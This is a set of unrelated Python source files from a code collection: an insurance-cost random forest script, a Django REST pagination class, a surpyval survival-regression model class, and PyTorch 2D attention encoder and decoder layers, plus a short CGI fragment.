form = cgi.FieldStorage()
user=form["user"].value
session=form["session"].value
target_user=form["target"].value
personal_homepage(user, target_user, session)
996,820 | fddcf5f097b956ab6715a93545dfc5e4598f73df |
import numpy as np
import pandas as pd
from sklearn.linear_model import LinearRegression
from sklearn.model_selection import train_test_split
from sklearn import linear_model
#various new tools we'll be using for this week! :0
from sklearn.preprocessing import LabelEncoder
from sklearn.model_selection import cross_val_score
from sklearn.ensemble import RandomForestRegressor
# Load the insurance dataset straight from GitHub (raw CSV).
url = 'https://github.com/millenopan/DGMI-Project/blob/master/insurance.csv?raw=true'
data = pd.read_csv(url)
# Label-encode the categorical columns in place. LabelEncoder assigns
# integer codes; the same encoder instance is refit for each column.
#sex
le = LabelEncoder()
le.fit(data.sex.drop_duplicates())
data.sex = le.transform(data.sex)
# smoker or not
le.fit(data.smoker.drop_duplicates())
data.smoker = le.transform(data.smoker)
#region
le.fit(data.region.drop_duplicates())
data.region = le.transform(data.region)
# Features are every column except the regression target 'charges'.
X = data.drop(['charges'], axis = 1)
y = data.charges
# Fixed random_state keeps the train/test split reproducible.
X_train,X_test,y_train,y_test = train_test_split(X,y, test_size=0.2, random_state=83)
rf = RandomForestRegressor(n_estimators = 200, n_jobs = -1)
# n_estimators = 200 means 200 trees, n_jobs = -1 uses all your CPU cores to compute them
rf.fit(X_train,y_train)
rf_pred_train = rf.predict(X_train)
rf_pred_test = rf.predict(X_test)
def predict(age, sex, bmi, children, smoker, region):
    """
    Predict an insurance charge with the module-level random forest.

    String arguments are case-insensitive. Encodings mirror the integer
    codes used at training time: sex female=0 / otherwise 1, smoker
    yes=1 / otherwise 0, region southwest=3, southeast=2, northwest=1,
    anything else 0.
    """
    region_codes = {"southwest": 3, "southeast": 2, "northwest": 1}
    num_sex = 0 if sex.lower() == "female" else 1
    num_smoker = 1 if smoker.lower() == "yes" else 0
    num_region = region_codes.get(region.lower(), 0)
    features = np.array([age, num_sex, bmi, children, num_smoker, num_region]).reshape(1, -1)
    return rf.predict(features)
|
996,821 | fd5a46f0ccee2706734e830e59f4d2dec89ed01f | from rest_framework.pagination import PageNumberPagination
class StandardResultsSetPagination(PageNumberPagination):
    """
    Custom class for managing pagination.
    http://www.django-rest-framework.org/api-guide/pagination/#pagenumberpagination
    """
    # Default number of items returned per page.
    page_size = 100
    # Query-string parameter selecting the page.
    page_query_param = "page"
    # Query-string parameter letting the client override page_size.
    page_size_query_param = "pageSize"
    # Hard upper bound on client-requested page sizes.
    max_page_size = 1000
|
996,822 | 7599016f5254a03d1692059c44e870e1cc84090e | import re
from autograd import jacobian
from autograd import grad
import autograd.numpy as np
from scipy.stats import uniform
from surpyval import round_sig, fs_to_xcn
from scipy.special import ndtri as z
from surpyval import nonparametric as nonp
from copy import deepcopy, copy
import matplotlib.pyplot as plt
from scipy.optimize import approx_fprime
class Regression():
"""
Result of ``.fit()`` or ``.from_params()`` method for every parametric surpyval
distribution.
Instances of this class are very useful when a user needs the other functions
of a distribution for plotting, optimizations, monte carlo analysis and numeric
integration.
"""
def __repr__(self):
dist_params = self.params[0:self.k_dist]
reg_model_params = self.params[self.k_dist:]
dist_param_string = '\n'.join(['{:>10}'.format(name) + ": "
+ str(p) for p, name in zip(dist_params, self.distribution.param_names)
if name not in self.fixed])
reg_model_param_string = '\n'.join(['{:>10}'.format(name) + ": "
+ str(p) for p, name in zip(reg_model_params, self.reg_model.phi_param_map)
if name not in self.fixed])
if hasattr(self, 'params'):
out = ('Parametric Regression SurPyval Model'
+ '\n===================================='
+ '\nKind : {kind}'
+ '\nDistribution : {dist}'
+ '\nRegression Model : {reg_model}'
+ '\nFitted by : MLE'
).format(kind=self.kind,
dist=self.distribution.name,
reg_model=self.reg_model.name)
out = (out + '\nDistribution :\n'
+ '{params}'.format(params=dist_param_string))
out = (out + '\nRegression Model :\n'
+ '{params}'.format(params=reg_model_param_string))
return out
else:
return "Unable to fit values"
def phi(self, X):
return self.reg_model.phi(X, *self.phi_params)
def sf(self, x, X):
r"""
Surival (or Reliability) function for a distribution using the parameters found in the ``.params`` attribute.
Parameters
----------
x : array like or scalar
The values of the random variables at which the survival function will be calculated
Returns
-------
sf : scalar or numpy array
The scalar value of the survival function of the distribution if a scalar was passed. If an array like object was passed then a numpy array is returned with the value of the survival function at each corresponding value in the input array.
Examples
--------
>>> from surpyval import Weibull
>>> model = Weibull.from_params([10, 3])
>>> model.sf(2)
0.9920319148370607
>>> model.sf([1, 2, 3, 4, 5])
array([0.9990005 , 0.99203191, 0.97336124, 0.938005 , 0.8824969 ])
"""
if type(x) == list:
x = np.array(x)
return self.model.sf(x, X, *self.params)
def ff(self, x, X):
r"""
The cumulative distribution function, or failure function, for a distribution using the parameters found in the ``.params`` attribute.
Parameters
----------
x : array like or scalar
The values of the random variables at which the failure function (CDF) will be calculated
Returns
-------
ff : scalar or numpy array
The scalar value of the CDF of the distribution if a scalar was passed. If an array like object was passed then a numpy array is returned with the value of the CDF at each corresponding value in the input array.
Examples
--------
>>> from surpyval import Weibull
>>> model = Weibull.from_params([10, 3])
>>> model.ff(2)
0.007968085162939342
>>> model.ff([1, 2, 3, 4, 5])
array([0.0009995 , 0.00796809, 0.02663876, 0.061995 , 0.1175031 ])
"""
if type(x) == list:
x = np.array(x)
return self.model.ff(x, X, *self.params)
def df(self, x, X):
r"""
The density function for a distribution using the parameters found in the ``.params`` attribute.
Parameters
----------
x : array like or scalar
The values of the random variables at which the density function will be calculated
Returns
-------
df : scalar or numpy array
The scalar value of the density function of the distribution if a scalar was passed. If an array like object was passed then a numpy array is returned with the value of the density function at each corresponding value in the input array.
Examples
--------
>>> from surpyval import Weibull
>>> model = Weibull.from_params([10, 3])
>>> model.df(2)
0.01190438297804473
>>> model.df([1, 2, 3, 4, 5])
array([0.002997 , 0.01190438, 0.02628075, 0.04502424, 0.06618727])
"""
if type(x) == list:
x = np.array(x)
return self.model.df(x, X, *self.params)
def hf(self, x, X):
r"""
The instantaneous hazard function for a distribution using the parameters found in the ``.params`` attribute.
Parameters
----------
x : array like or scalar
The values of the random variables at which the instantaneous hazard function will be calculated
Returns
-------
hf : scalar or numpy array
The scalar value of the instantaneous hazard function of the distribution if a scalar was passed. If an array like object was passed then a numpy array is returned with the value of the instantaneous hazard function at each corresponding value in the input array.
Examples
--------
>>> from surpyval import Weibull
>>> model = Weibull.from_params([10, 3])
>>> model.hf(2)
0.012000000000000002
>>> model.hf([1, 2, 3, 4, 5])
array([0.003, 0.012, 0.027, 0.048, 0.075])
"""
if type(x) == list:
x = np.array(x)
return self.model.hf(x, X, *self.params)
def Hf(self, x, X):
r"""
The cumulative hazard function for a distribution using the parameters found in the ``.params`` attribute.
Parameters
----------
x : array like or scalar
The values of the random variables at which the cumulative hazard function will be calculated
Returns
-------
Hf : scalar or numpy array
The scalar value of the cumulative hazard function of the distribution if a scalar was passed. If an array like object was passed then a numpy array is returned with the value of the cumulative hazard function at each corresponding value in the input array.
Examples
--------
>>> from surpyval import Weibull
>>> model = Weibull.from_params([10, 3])
>>> model.Hf(2)
0.008000000000000002
>>> model.Hf([1, 2, 3, 4, 5])
array([0.001, 0.008, 0.027, 0.064, 0.125])
"""
if type(x) == list:
x = np.array(x)
return self.model.hf(x, X, *self.params)
    def random(self, size, X):
        r"""
        Draw random samples from the distribution using the parameters
        found in the ``.params`` attribute.

        Parameters
        ----------
        size : int
            The number of random samples to be drawn from the distribution.
        X : scalar or array like
            The value(s) of the stresses at which the random samples are drawn.

        Returns
        -------
        random : numpy array
            ``size`` random values drawn from the distribution. For the
            limited-failure-population branches the values are returned via
            ``fs_to_xcn`` (failures and right-censored points combined).

        Examples
        --------
        >>> from surpyval import Weibull
        >>> model = Weibull.from_params([10, 3])
        >>> np.random.seed(1)
        >>> model.random(1)
        array([8.14127103])
        """
        # Four cases driven by the LFP proportion p and the zero-inflation
        # fraction f0. Sampling is inverse-transform: qf(U) with U ~ Uniform.
        # NOTE(review): the X argument is never used here — the quantile
        # function is called without the stress; confirm this is intended.
        if (self.p == 1) and (self.f0 == 0):
            # Plain distribution, shifted by the location parameter gamma.
            return self.dist.qf(uniform.rvs(size=size), *self.params) + self.gamma
        elif (self.p != 1) and (self.f0 == 0):
            # LFP model: only a Binomial(size, p) number of units ever fail;
            # the remainder are censored just past the largest failure.
            n_obs = np.random.binomial(size, self.p)
            f = self.dist.qf(uniform.rvs(size=n_obs), *self.params) + self.gamma
            s = np.ones(np.array(size) - n_obs) * np.max(f) + 1
            return fs_to_xcn(f, s)
        elif (self.p == 1) and (self.f0 != 0):
            # Zero-inflated model: a Binomial(size, f0) number of units are
            # "dead on arrival" at gamma; order is randomized by shuffle.
            n_doa = np.random.binomial(size, self.f0)
            x0 = np.zeros(n_doa) + self.gamma
            x = self.dist.qf(uniform.rvs(size=size - n_doa), *self.params) + self.gamma
            x = np.concatenate([x, x0])
            np.random.shuffle(x)
            return x
        else:
            # Combined zero-inflated + LFP model: multinomial split into
            # dead-on-arrival / observed failures / censored.
            N = np.random.multinomial(1, [self.f0, self.p - self.f0, 1. - self.p], size).sum(axis=0)
            N = np.atleast_2d(N)
            n_doa, n_obs, n_cens = N[:, 0], N[:, 1], N[:, 2]
            x0 = np.zeros(n_doa) + self.gamma
            x = self.dist.qf(uniform.rvs(size=n_obs), *self.params) + self.gamma
            f = np.concatenate([x, x0])
            s = np.ones(n_cens) * np.max(f) + 1
            # raise NotImplementedError("Combo zero-inflated and lfp model not yet supported")
            return fs_to_xcn(f, s)
def neg_ll(self):
r"""
The the negative log-likelihood for the model, if it was fit with the ``fit()`` method. Not available if fit with the ``from_params()`` method.
Parameters
----------
None
Returns
-------
neg_ll : float
The negative log-likelihood of the model
Examples
--------
>>> from surpyval import Weibull
>>> import numpy as np
>>> np.random.seed(1)
>>> x = Weibull.random(100, 10, 3)
>>> model = Weibull.fit(x)
>>> model.neg_ll()
262.52685642385734
"""
if not hasattr(self, 'data'):
raise ValueError("Must have been fit with data")
return self._neg_ll
def bic(self):
r"""
The the Bayesian Information Criterion (BIC) for the model, if it was fit with the ``fit()`` method. Not available if fit with the ``from_params()`` method.
Parameters
----------
None
Returns
-------
bic : float
The BIC of the model
Examples
--------
>>> from surpyval import Weibull
>>> import numpy as np
>>> np.random.seed(1)
>>> x = Weibull.random(100, 10, 3)
>>> model = Weibull.fit(x)
>>> model.bic()
534.2640532196908
References:
-----------
`Bayesian Information Criterion for Censored Survival Models <https://www.jstor.org/stable/2677130>`_.
"""
if hasattr(self, '_bic'):
return self._bic
else:
self._bic = self.k * np.log(self.data['n'][self.data['c'] == 0].sum()) + 2 * self.neg_ll()
return self._bic
def aic(self):
r"""
The the Aikake Information Criterion (AIC) for the model, if it was fit with the ``fit()`` method. Not available if fit with the ``from_params()`` method.
Parameters
----------
None
Returns
-------
aic : float
The AIC of the model
Examples
--------
>>> from surpyval import Weibull
>>> import numpy as np
>>> np.random.seed(1)
>>> x = Weibull.random(100, 10, 3)
>>> model = Weibull.fit(x)
>>> model.aic()
529.0537128477147
"""
if hasattr(self, '_aic'):
return self._aic
else:
self._aic = 2 * self.k + 2 * self.neg_ll()
return self._aic
def aic_c(self):
r"""
The the Corrected Aikake Information Criterion (AIC) for the model, if it was fit with the ``fit()`` method. Not available if fit with the ``from_params()`` method.
Parameters
----------
None
Returns
-------
aic_c : float
The Corrected AIC of the model
Examples
--------
>>> from surpyval import Weibull
>>> import numpy as np
>>> np.random.seed(1)
>>> x = Weibull.random(100, 10, 3)
>>> model = Weibull.fit(x)
>>> model.aic()
529.1774241879209
"""
if hasattr(self, '_aic_c'):
return self._aic_c
else:
k = len(self.params)
n = self.data['n'].sum()
self._aic_c = self.aic() + (2*k**2 + 2*k)/(n - k - 1)
return self._aic_c
|
996,823 | a9148072db6d1b9d679e3ea8d67bf28e5e2a2174 | """
"""
import torch
import torch.nn as nn
import torch.nn.functional as F
from models.jointnet.attention2d import MultiHeadAttention2D, conv_for_sequence
def expand(img_seq, expansion):
    """
    Repeat every frame of a (B, S, C, H, W) image sequence ``expansion``
    times along the sequence axis, keeping per-frame order
    (s0, s0, ..., s1, s1, ...).

    Parameters
    ----------
    img_seq : torch.Tensor
        Image sequence of shape (B, S, C, H, W).
    expansion : int
        Copies per frame; any value below 2 returns the input unchanged.

    Returns
    -------
    torch.Tensor
        Tensor of shape (B, S * expansion, C, H, W).
    """
    if expansion < 2:
        return img_seq
    # Single C-level op replacing the per-index slice/expand/cat loop:
    # repeat_interleave along dim=1 yields the same contiguous result.
    return img_seq.repeat_interleave(expansion, dim=1)
class EncoderLayer2D(nn.Module):
    """
    Encoder layer for image sequences of shape (B, S, C, H, W): 2-D
    multi-head self-attention followed by a convolutional feed-forward
    step, each wrapped with a residual connection and a LayerNorm.
    """
    def __init__(self, h, w, channels, expansion
                 , q_out_channels, q_kernel, q_stride, q_padding
                 , k_out_channels, k_kernel, k_stride, k_padding
                 , v_out_channels, v_kernel, v_stride, v_padding
                 , transform_kernel, transform_stride, transform_padding
                 , ff_out_channels, ff_kernel, ff_stride, ff_padding):
        """
        h, w, channels -- spatial size and channel count of the input frames
        expansion      -- per-frame repetition factor applied in forward()
        q/k/v_*        -- conv parameters of the attention projections
        transform_*    -- conv parameters of the attention output transform
        ff_*           -- conv parameters of the feed-forward convolution
        """
        super().__init__()
        # input size is (B, S, C, H, W)
        self.h_0, self.w_0 = h, w
        self.expansion = expansion
        self.mha2d = MultiHeadAttention2D(q_in_channels=channels
                                          , q_out_channels=q_out_channels
                                          , q_kernel=q_kernel
                                          , q_stride=q_stride
                                          , q_padding=q_padding
                                          , k_in_channels=channels
                                          , k_out_channels=k_out_channels
                                          , k_kernel=k_kernel
                                          , k_stride=k_stride
                                          , k_padding=k_padding
                                          , v_in_channels=channels
                                          , v_out_channels=v_out_channels
                                          , v_kernel=v_kernel
                                          , v_stride=v_stride
                                          , v_padding=v_padding
                                          , transform_kernel=transform_kernel
                                          , transform_stride=transform_stride
                                          , transform_padding=transform_padding)
        # Spatial size after the value conv (standard conv output-size
        # formula); taken here as the attention output's spatial size.
        self.h_1, self.w_1 = (self.h_0 - v_kernel + 2 * v_padding) // v_stride + 1\
            , (self.w_0 - v_kernel + 2 * v_padding) // v_stride + 1
        self.ln_1 = nn.LayerNorm([v_out_channels, self.h_1, self.w_1])
        # Projection for the first residual branch, needed only when the
        # attention changes the spatial size or channel count.
        self.downsample_1 = None
        if self.h_1 != self.h_0 or self.w_1 != self.w_0 or channels != v_out_channels:
            self.downsample_1 = nn.Conv2d(channels, v_out_channels, kernel_size=v_kernel
                                          , stride=v_stride, padding=v_padding)
        # Feed-forward convolution replacing the transformer MLP.
        self.conv = nn.Conv2d(v_out_channels, ff_out_channels, kernel_size=ff_kernel
                              , stride=ff_stride, padding=ff_padding)
        self.h_2, self.w_2 = (self.h_1 - ff_kernel + 2 * ff_padding) // ff_stride + 1\
            , (self.w_1 - ff_kernel + 2 * ff_padding) // ff_stride + 1
        self.ln_2 = nn.LayerNorm([ff_out_channels, self.h_2, self.w_2])
        # Projection for the second residual branch, mirroring downsample_1.
        self.downsample_2 = None
        if self.h_2 != self.h_1 or self.w_2 != self.w_1 or v_out_channels != ff_out_channels:
            self.downsample_2 = nn.Conv2d(v_out_channels, ff_out_channels, kernel_size=ff_kernel
                                          , stride=ff_stride, padding=ff_padding)
        # Output geometry, exposed so layers can be stacked.
        self.out_channels = ff_out_channels
        self.out_h, self.out_w = self.h_2, self.w_2

    def forward(self, img_seq):
        """Run self-attention + conv feed-forward over a (B, S, C, H, W) sequence."""
        # input size is (B, S, C, H, W)
        img_seq = expand(img_seq, self.expansion)
        # Self-attention sub-layer: residual add (projected when shapes
        # differ), ReLU, then LayerNorm.
        temp = self.mha2d(img_seq, img_seq, img_seq)
        if self.downsample_1 is not None:
            img_seq = F.relu(conv_for_sequence(img_seq, self.downsample_1) + temp, inplace=True)
        else:
            img_seq = F.relu(img_seq + temp, inplace=True)
        img_seq = self.ln_1(img_seq)
        # Feed-forward sub-layer with the same residual/ReLU/LayerNorm shape.
        temp = F.relu(conv_for_sequence(img_seq, self.conv), inplace=True)
        if self.downsample_2 is not None:
            img_seq = F.relu(conv_for_sequence(img_seq, self.downsample_2) + temp, inplace=True)
        else:
            img_seq = F.relu(img_seq + temp, inplace=True)
        img_seq = self.ln_2(img_seq)
        return img_seq
class DecoderLayer2D(nn.Module):
    """Transformer-style decoder layer over sequences of 2D feature maps.

    Tensors have shape (B, S, C, H, W). Sub-layers, each with a residual
    connection (identity or Conv2d projection when shapes change) and a
    LayerNorm:
      1. 2D multi-head self-attention over the input sequence,
      2. 2D multi-head cross-attention against encoder features `kv`,
      3. a convolutional feed-forward step.
    Optionally the output is resized to (target_h, target_w) by bilinear-ish
    interpolation followed by a Conv2d (upsample-by-resize instead of a
    transposed convolution).

    out_h / out_w / out_channels describe the final output for chaining.
    """
    def __init__(self, h, w, channels, expansion
                 , q1_out_channels, q1_kernel, q1_stride, q1_padding
                 , k1_out_channels, k1_kernel, k1_stride, k1_padding
                 , v1_out_channels, v1_kernel, v1_stride, v1_padding
                 , transform1_kernel, transform1_stride, transform1_padding
                 , kv_h, kv_w, kv_channels
                 , q2_out_channels, q2_kernel, q2_stride, q2_padding
                 , k2_out_channels, k2_kernel, k2_stride, k2_padding
                 , v2_out_channels, v2_kernel, v2_stride, v2_padding
                 , transform2_kernel, transform2_stride, transform2_padding
                 , ff_out_channels, ff_kernel, ff_stride, ff_padding
                 , target_h, target_w, upsample_out_channels, upsample_kernel, upsample_stride, upsample_padding):
        super().__init__()
        # input size is (B, S, C, H, W)
        self.h_0, self.w_0 = h, w
        self.expansion = expansion
        self.target_h, self.target_w = target_h, target_w
        # Sub-layer 1: self-attention on the decoder input.
        self.mha2d_1 = MultiHeadAttention2D(q_in_channels=channels
                                            , q_out_channels=q1_out_channels
                                            , q_kernel=q1_kernel
                                            , q_stride=q1_stride
                                            , q_padding=q1_padding
                                            , k_in_channels=channels
                                            , k_out_channels=k1_out_channels
                                            , k_kernel=k1_kernel
                                            , k_stride=k1_stride
                                            , k_padding=k1_padding
                                            , v_in_channels=channels
                                            , v_out_channels=v1_out_channels
                                            , v_kernel=v1_kernel
                                            , v_stride=v1_stride
                                            , v_padding=v1_padding
                                            , transform_kernel=transform1_kernel
                                            , transform_stride=transform1_stride
                                            , transform_padding=transform1_padding)
        # Conv output-size formula: (in - kernel + 2*padding) // stride + 1.
        self.h_1, self.w_1 = (self.h_0 - v1_kernel + 2 * v1_padding) // v1_stride + 1\
                             , (self.w_0 - v1_kernel + 2 * v1_padding) // v1_stride + 1
        self.ln_1 = nn.LayerNorm([v1_out_channels, self.h_1, self.w_1])
        self.downsample_1 = None
        if self.h_1 != self.h_0 or self.w_1 != self.w_0 or channels != v1_out_channels:
            self.downsample_1 = nn.Conv2d(channels, v1_out_channels, kernel_size=v1_kernel
                                          , stride=v1_stride, padding=v1_padding)
        # Sub-layer 2: cross-attention; keys/values come from the (kv_h, kv_w,
        # kv_channels) encoder features.
        self.mha2d_2 = MultiHeadAttention2D(q_in_channels=v1_out_channels
                                            , q_out_channels=q2_out_channels
                                            , q_kernel=q2_kernel
                                            , q_stride=q2_stride
                                            , q_padding=q2_padding
                                            , k_in_channels=kv_channels
                                            , k_out_channels=k2_out_channels
                                            , k_kernel=k2_kernel
                                            , k_stride=k2_stride
                                            , k_padding=k2_padding
                                            , v_in_channels=kv_channels
                                            , v_out_channels=v2_out_channels
                                            , v_kernel=v2_kernel
                                            , v_stride=v2_stride
                                            , v_padding=v2_padding
                                            , transform_kernel=transform2_kernel
                                            , transform_stride=transform2_stride
                                            , transform_padding=transform2_padding)
        # Output spatial size here is driven by the kv feature map.
        self.h_2, self.w_2 = (kv_h - v2_kernel + 2 * v2_padding) // v2_stride + 1\
                             , (kv_w - v2_kernel + 2 * v2_padding) // v2_stride + 1
        self.ln_2 = nn.LayerNorm([v2_out_channels, self.h_2, self.w_2])
        self.downsample_2 = None
        if self.h_2 != self.h_1 or self.w_2 != self.w_1 or v1_out_channels != v2_out_channels:
            self.downsample_2 = nn.Conv2d(v1_out_channels, v2_out_channels, kernel_size=v2_kernel
                                          , stride=v2_stride, padding=v2_padding)
        # Sub-layer 3: convolutional feed-forward.
        self.conv = nn.Conv2d(v2_out_channels, ff_out_channels, kernel_size=ff_kernel
                              , stride=ff_stride, padding=ff_padding)
        self.h_3, self.w_3 = (self.h_2 - ff_kernel + 2 * ff_padding) // ff_stride + 1\
                             , (self.w_2 - ff_kernel + 2 * ff_padding) // ff_stride + 1
        self.ln_3 = nn.LayerNorm([ff_out_channels, self.h_3, self.w_3])
        self.downsample_3 = None
        if self.h_3 != self.h_2 or self.w_3 != self.w_2 or v2_out_channels != ff_out_channels:
            self.downsample_3 = nn.Conv2d(v2_out_channels, ff_out_channels, kernel_size=ff_kernel
                                          , stride=ff_stride, padding=ff_padding)
        self.out_channels = ff_out_channels
        self.out_h, self.out_w = self.h_3, self.w_3
        # Optional resize-then-conv "upsampling" stage toward (target_h, target_w).
        self.upsample_conv = None
        if target_h is not None and target_w is not None and (target_h != self.h_3 or target_w != self.w_3):
            self.upsample_conv = nn.Conv2d(ff_out_channels, upsample_out_channels
                                           , kernel_size=upsample_kernel, stride=upsample_stride
                                           , padding=upsample_padding)
            self.out_h, self.out_w = self.target_h, self.target_w
            self.out_channels = upsample_out_channels
    def forward(self, img_seq, kv):
        """Decode a (B, S, C, H, W) sequence against encoder features `kv`."""
        # input size is (B, S, C, H, W)
        img_seq = expand(img_seq, self.expansion)
        # Self-attention sub-layer (residual + norm).
        temp = self.mha2d_1(img_seq, img_seq, img_seq)
        if self.downsample_1 is not None:
            img_seq = F.relu(conv_for_sequence(img_seq, self.downsample_1) + temp, inplace=True)
        else:
            img_seq = F.relu(img_seq + temp, inplace=True)
        img_seq = self.ln_1(img_seq)
        # Cross-attention sub-layer: queries from the decoder, keys/values from kv.
        temp = self.mha2d_2(img_seq, kv, kv)
        if self.downsample_2 is not None:
            img_seq = F.relu(conv_for_sequence(img_seq, self.downsample_2) + temp, inplace=True)
        else:
            img_seq = F.relu(img_seq + temp, inplace=True)
        img_seq = self.ln_2(img_seq)
        # Feed-forward sub-layer.
        temp = F.relu(conv_for_sequence(img_seq, self.conv), inplace=True)
        if self.downsample_3 is not None:
            img_seq = F.relu(conv_for_sequence(img_seq, self.downsample_3) + temp, inplace=True)
        else:
            img_seq = F.relu(img_seq + temp, inplace=True)
        img_seq = self.ln_3(img_seq)
        if self.upsample_conv is not None:
            # Flatten (B, S) so interpolate sees 4D input, resize spatially to
            # (out_h, out_w), restore the sequence dim, then project channels.
            _shape = img_seq.shape
            img_seq = F.interpolate(
                img_seq.view(-1, _shape[2], _shape[3], _shape[4])
                , (self.out_h, self.out_w)
            ).view(_shape[0], -1, _shape[2], self.out_h, self.out_w).contiguous()
            img_seq = F.relu(conv_for_sequence(img_seq, self.upsample_conv), inplace=True)
        return img_seq
class Encoder2D(nn.Module):
    """Three-stage encoder built from EncoderLayer2D blocks.

    forward() returns the output of *every* layer (a list of three tensors)
    so a decoder can cross-attend to multi-scale features. The size comments
    below assume a (B, 2, 3, 256, 256) input; `expansions` controls how much
    each layer expands the sequence dimension.
    """
    def __init__(self, h, w, channels, expansions):
        super().__init__()
        # assuming the input image size is (B, 3, 256, 256)
        # input size is (B, 2, 3, 256, 256)
        self.expansions = expansions
        self.encoder_layer_1 = EncoderLayer2D(h=h
                                              , w=w
                                              , channels=channels
                                              , expansion=expansions[0]
                                              , q_out_channels=32
                                              , q_kernel=7
                                              , q_stride=2
                                              , q_padding=0
                                              , k_out_channels=32
                                              , k_kernel=7
                                              , k_stride=2
                                              , k_padding=0
                                              , v_out_channels=32
                                              , v_kernel=7
                                              , v_stride=2
                                              , v_padding=0
                                              , transform_kernel=1
                                              , transform_stride=1
                                              , transform_padding=0
                                              , ff_out_channels=32
                                              , ff_kernel=3
                                              , ff_stride=1
                                              , ff_padding=1)
        # output size is (B, 2, 32, 125, 125)
        # input size is (B, 2, 32, 125, 125)
        self.encoder_layer_2 = EncoderLayer2D(h=self.encoder_layer_1.out_h
                                              , w=self.encoder_layer_1.out_w
                                              , channels=self.encoder_layer_1.out_channels
                                              , expansion=expansions[1]
                                              , q_out_channels=32
                                              , q_kernel=7
                                              , q_stride=2
                                              , q_padding=0
                                              , k_out_channels=32
                                              , k_kernel=7
                                              , k_stride=2
                                              , k_padding=0
                                              , v_out_channels=32
                                              , v_kernel=7
                                              , v_stride=2
                                              , v_padding=0
                                              , transform_kernel=1
                                              , transform_stride=1
                                              , transform_padding=0
                                              , ff_out_channels=32
                                              , ff_kernel=3
                                              , ff_stride=1
                                              , ff_padding=1)
        # output size is (B, 4, 32, 60, 60)
        # input size is (B, 4, 32, 60, 60)
        self.encoder_layer_3 = EncoderLayer2D(h=self.encoder_layer_2.out_h
                                              , w=self.encoder_layer_2.out_w
                                              , channels=self.encoder_layer_2.out_channels
                                              , expansion=expansions[2]
                                              , q_out_channels=64
                                              , q_kernel=7
                                              , q_stride=2
                                              , q_padding=0
                                              , k_out_channels=64
                                              , k_kernel=7
                                              , k_stride=2
                                              , k_padding=0
                                              , v_out_channels=64
                                              , v_kernel=7
                                              , v_stride=2
                                              , v_padding=0
                                              , transform_kernel=1
                                              , transform_stride=1
                                              , transform_padding=0
                                              , ff_out_channels=64
                                              , ff_kernel=3
                                              , ff_stride=1
                                              , ff_padding=1)
        # output size is (B, 8, 64, 27, 27)
    def forward(self, img_seq):
        """Return the list [layer1_out, layer2_out, layer3_out] for img_seq."""
        embeddings = []
        img_seq = self.encoder_layer_1(img_seq)
        embeddings.append(img_seq)
        img_seq = self.encoder_layer_2(img_seq)
        embeddings.append(img_seq)
        img_seq = self.encoder_layer_3(img_seq)
        embeddings.append(img_seq)
        return embeddings
class Decoder2D(nn.Module):
    """Decoder: a private scope encoder plus three DecoderLayer2D stages.

    The scope sequence is first run through an internal Encoder2D (no
    sequence expansion); its deepest embedding becomes the query stream,
    which is then decoded against the caller-provided multi-scale encoder
    embeddings from deepest to shallowest, upsampling back toward (h, w).

    kvs_h / kvs_w / kvs_channels describe the shapes of the embeddings
    passed to forward(), ordered shallow -> deep.
    """
    def __init__(self, h, w, channels, kvs_h, kvs_w, kvs_channels):
        super().__init__()
        # use upsampling + conv instead of deconv
        # the upsampling + conv is performed in the layer after multi-head attention
        # assuming the input scope size is (B, 1, 1, 256, 256)
        # input size is (B, 1, 1, 256, 256)
        self.encoder = Encoder2D(h, w, channels, [1, 1, 1])
        # output size is (B, 1, 64, 27, 27)
        # input q size is (B, 1, 64, 27, 27)
        # input kv size is (B, 8, 64, 27, 27)
        self.decoder_layer_1 = DecoderLayer2D(h=self.encoder.encoder_layer_3.out_h
                                              , w=self.encoder.encoder_layer_3.out_w
                                              , channels=self.encoder.encoder_layer_3.out_channels
                                              , expansion=1
                                              , q1_out_channels=64
                                              , q1_kernel=7
                                              , q1_stride=1
                                              , q1_padding=3
                                              , k1_out_channels=64
                                              , k1_kernel=7
                                              , k1_stride=1
                                              , k1_padding=3
                                              , v1_out_channels=64
                                              , v1_kernel=7
                                              , v1_stride=1
                                              , v1_padding=3
                                              , transform1_kernel=1
                                              , transform1_stride=1
                                              , transform1_padding=0
                                              , kv_h=kvs_h[-1]
                                              , kv_w=kvs_w[-1]
                                              , kv_channels=kvs_channels[-1]
                                              , q2_out_channels=64
                                              , q2_kernel=7
                                              , q2_stride=1
                                              , q2_padding=3
                                              , k2_out_channels=64
                                              , k2_kernel=7
                                              , k2_stride=1
                                              , k2_padding=3
                                              , v2_out_channels=64
                                              , v2_kernel=7
                                              , v2_stride=1
                                              , v2_padding=3
                                              , transform2_kernel=1
                                              , transform2_stride=1
                                              , transform2_padding=0
                                              , ff_out_channels=64
                                              , ff_kernel=3
                                              , ff_stride=1
                                              , ff_padding=1
                                              , target_h=kvs_h[-2]
                                              , target_w=kvs_w[-2]
                                              , upsample_out_channels=kvs_channels[-2]
                                              , upsample_kernel=3
                                              , upsample_stride=1
                                              , upsample_padding=1)
        # output size is (B, 1, 32, 60, 60)
        # input size is (B, 1, 32, 60, 60)
        # input kv size is (B, 4, 32, 60, 60)
        self.decoder_layer_2 = DecoderLayer2D(h=self.decoder_layer_1.out_h
                                              , w=self.decoder_layer_1.out_w
                                              , channels=self.decoder_layer_1.out_channels
                                              , expansion=1
                                              , q1_out_channels=32
                                              , q1_kernel=7
                                              , q1_stride=1
                                              , q1_padding=3
                                              , k1_out_channels=32
                                              , k1_kernel=7
                                              , k1_stride=1
                                              , k1_padding=3
                                              , v1_out_channels=32
                                              , v1_kernel=7
                                              , v1_stride=1
                                              , v1_padding=3
                                              , transform1_kernel=1
                                              , transform1_stride=1
                                              , transform1_padding=0
                                              , kv_h=kvs_h[-2]
                                              , kv_w=kvs_w[-2]
                                              , kv_channels=kvs_channels[-2]
                                              , q2_out_channels=32
                                              , q2_kernel=7
                                              , q2_stride=1
                                              , q2_padding=3
                                              , k2_out_channels=32
                                              , k2_kernel=7
                                              , k2_stride=1
                                              , k2_padding=3
                                              , v2_out_channels=32
                                              , v2_kernel=7
                                              , v2_stride=1
                                              , v2_padding=3
                                              , transform2_kernel=1
                                              , transform2_stride=1
                                              , transform2_padding=0
                                              , ff_out_channels=32
                                              , ff_kernel=3
                                              , ff_stride=1
                                              , ff_padding=1
                                              , target_h=kvs_h[-3]
                                              , target_w=kvs_w[-3]
                                              , upsample_out_channels=kvs_channels[-3]
                                              , upsample_kernel=3
                                              , upsample_stride=1
                                              , upsample_padding=1)
        # output size is (B, 1, 32, 125, 125)
        # input size is (B, 1, 32, 125, 125)
        # input kv size is (B, 2, 32, 125, 125)
